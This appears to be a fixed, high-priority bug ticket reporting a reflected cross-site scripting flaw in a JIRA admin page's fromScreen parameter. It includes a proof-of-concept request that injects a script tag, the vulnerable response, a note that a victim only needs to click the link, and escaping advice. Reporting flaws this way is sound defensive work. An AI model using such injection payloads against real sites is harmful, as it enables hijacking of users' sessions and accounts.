-
Type:
Bug
-
Resolution: Fixed
-
Priority:
High
-
Component/s: None
-
7.5
fromScreen is passed unfiltered into the results page. Contents of the field persist through the "missing XSRF token" screen, so exploitation is trivial - just get your victim to click on the link without a token.
GET /secure/admin/AssociateProjectRepPath!default.jspa?projectId=10000&fromScreen="><script>alert(1)</script>
Response
<input type='submit' accesskey="s" value="Submit" />
<input type='button' accesskey="`" value="Cancel"
onclick="window.location = '/secure/admin/ViewFishEyeConfig.jspa';"
/>
<input type='hidden' name="submitted" value="true" />
<input type='hidden' name="projectId" value="10000" />
<input type="hidden" name="fromScreen" value=""><script>alert(1)</script>" /> </center>
The content appears in HTML attribute context and in HTML context, so "<" and quote itself have to be escaped.
See fixing HOWTO at https://extranet.atlassian.com/display/SECCOUNCIL/HOWTO+-+Fixing+JIRA+Security+Issues